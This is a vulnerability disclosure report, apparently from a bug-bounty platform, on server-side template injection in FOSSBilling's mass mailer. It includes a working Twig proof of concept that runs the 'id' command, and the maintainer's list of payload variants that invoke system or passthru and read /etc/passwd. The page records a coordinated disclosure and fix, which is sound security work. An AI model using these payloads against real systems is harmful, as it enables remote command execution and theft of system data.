Server-Side Template Injection leads to Remote Code Execution in fossbilling/fossbilling

Valid

Reported on

Jun 15th 2023


Description

Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack

Proof of Concept

Log in as an admin or a staff who has "Mass mailer" permission, edit a message image

In the "Email content" field, insert the following value and click "Update and preview"

{% apply markdown %}
Greeting from {{ ['id']|filter('system') }}
Your email is: {{ c.email }}

Order our services at {{ "order"|link }}

{{ guest.system_company.name }}
{% endapply %}

image

Observed that the command "id" was successfully executed image

Impact

An authenticated Admin or Staff can achieve a full remote command execution on the OS level under the web server user.

Occurrences

We are processing your report and will contact the fossbilling team within 24 hours. 3 months ago
Belle Aerni modified the Severity from Critical (9.1) to High (8) 3 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Belle Aerni validated this vulnerability 3 months ago

Hello, Thanks for the report. I've been able to validate this on my end.

Generally I'd probably close this type of report as the primary issue appears to be on Twig's end, however from what I can tell it's been known for roughly 3 years so they don't seem to be interested in providing protection against this type of exploit, leaving the responsibility on us.

Just as a heads up, I did modify the attack complexity, as the scope of what could be done is dependent on the server effected and how it's permissions are configured.

I have submitted a pull request against our repository to prevent this & I have validated that it prevents the following POC snippets I found online for this Twig exploit:

{{['id']|filter('system')}}
{{[0]|reduce('system','id')}}
{{['id']|map('system')|join}}
{{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
hiu240900 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hiu240900
3 months ago

Researcher


Hello, Thanks for the response.

Hopefully the patch will be released soon, is it still be able to assign a CVE?

Belle Aerni
3 months ago

Maintainer


Hi there,

The patch sill needs to be reviewed by other FOSSBilling contributors before it can be merged and released, however I expect the total time between now and a patched release to be about a week.

Once it's merged and we have a release made, a CVE will be assigned to this report. Thanks!

hiu240900
3 months ago

Researcher


Thanks for the information!

Belle Aerni marked this as fixed in 0.5.1 with commit 47343f 3 months ago
Belle Aerni has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jul 3rd 2023
index.html#L1 has been validated
Belle Aerni published this vulnerability 3 months ago
to join this conversation